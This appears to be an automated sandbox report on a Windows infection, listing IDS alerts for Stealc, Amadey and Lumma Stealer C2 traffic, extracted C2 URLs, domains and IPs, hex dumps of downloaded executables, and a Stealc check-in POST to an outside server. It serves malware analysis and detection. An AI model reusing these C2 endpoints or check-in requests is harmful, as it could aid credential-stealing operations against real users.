                          Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49714
                          Source: Network traffic | Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49714
                          Source: Network traffic | Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49909 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49918
                          Source: Network traffic | Suricata IDS: 2057928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2057976 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.6:63523 -> 1.1.1.1:53
                          Source: Network traffic | Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.6:63523 -> 1.1.1.1:53
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49944 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2057928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49952 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2057976 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49952 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49967 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49985 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50003 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50010 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50018 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50024 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50038 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50031 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50039 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:58337 -> 1.1.1.1:53
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50054 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50061 -> 185.215.113.43:80
                          Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50060 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50069 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50084 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50089 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50090 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50086 -> 185.215.113.206:80
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50085 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50088 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50018 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50069 -> 172.67.165.166:443
                          Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50089 -> 172.67.165.166:443
                          Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractor | URLs: covery-mover.biz
                          Source: Malware configuration extractor | URLs: formy-spill.biz
                          Source: Malware configuration extractor | URLs: dwell-exclaim.biz
                          Source: Malware configuration extractor | URLs: dare-curbys.biz
                          Source: Malware configuration extractor | URLs: zinc-sneark.biz
                          Source: Malware configuration extractor | URLs: atten-supporse.biz
                          Source: Malware configuration extractor | URLs: print-vexer.biz
                          Source: Malware configuration extractor | URLs: impend-differ.biz
                          Source: Malware configuration extractor | URLs: se-blurry.biz
                          Source: Malware configuration extractor | IPs: 185.215.113.43
                          Source: Malware configuration extractor | IPs: 92.63.197.221
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 
00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 05 Dec 2024 06:33:45 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "94750-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 608080; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 05 Dec 2024 06:33:46 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "6dde8-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 450024; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 05 Dec 2024 06:33:47 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "1f3950-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 2046288; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 05 Dec 2024 06:33:51 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "3ef50-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 257872; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 05 Dec 2024 06:33:52 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "13bf0-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 80880; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:33:57 GMT; Content-Type: application/octet-stream; Content-Length: 3250176; Last-Modified: Thu, 05 Dec 2024 06:18:33 GMT; Connection: keep-alive; ETag: "675145b9-319800"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:34:21 GMT; Content-Type: application/octet-stream; Content-Length: 1840640; Last-Modified: Thu, 05 Dec 2024 01:48:39 GMT; Connection: keep-alive; ETag: "67510677-1c1600"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:34:29 GMT; Content-Type: application/octet-stream; Content-Length: 1928192; Last-Modified: Thu, 05 Dec 2024 05:58:50 GMT; Connection: keep-alive; ETag: "6751411a-1d6c00"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:34:37 GMT; Content-Type: application/octet-stream; Content-Length: 1809408; Last-Modified: Thu, 05 Dec 2024 06:18:18 GMT; Connection: keep-alive; ETag: "675145aa-1b9c00"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:34:47 GMT; Content-Type: application/octet-stream; Content-Length: 1823744; Last-Modified: Thu, 05 Dec 2024 06:18:25 GMT; Connection: keep-alive; ETag: "675145b1-1bd400"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:34:56 GMT; Content-Type: application/octet-stream; Content-Length: 971776; Last-Modified: Thu, 05 Dec 2024 06:16:32 GMT; Connection: keep-alive; ETag: "67514540-ed400"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Thu, 05 Dec 2024 06:35:04 GMT; Content-Type: application/octet-stream; Content-Length: 2871808; Last-Modified: Thu, 05 Dec 2024 06:16:58 GMT; Connection: keep-alive; ETag: "6751455a-2bd200"; Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:35:14 GMTContent-Type: application/octet-streamContent-Length: 4480000Last-Modified: Thu, 05 Dec 2024 05:10:14 GMTConnection: keep-aliveETag: "675135b6-445c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 70 9d 4d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 a4 4b 00 00 6c 7a 00 00 32 00 00 00 00 cd 00 00 10 00 00 00 c0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 cd 00 00 04 00 00 fd a0 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f e0 77 00 73 00 00 00 00 d0 77 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 ed cc 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ec cc 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 77 00 00 10 00 00 00 40 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 d0 77 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 77 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 39 00 00 f0 77 00 00 02 00 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 64 76 73 63 69 76 6f 00 e0 1b 00 00 10 b1 00 00 e0 1b 00 
00 56 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 67 72 78 70 63 6c 68 00 10 00 00 00 f0 cc 00 00 04 00 00 00 36 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 cd 00 00 22 00 00 00 3a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="build"drum------BKECFIIEHCFHIECAFBAK--
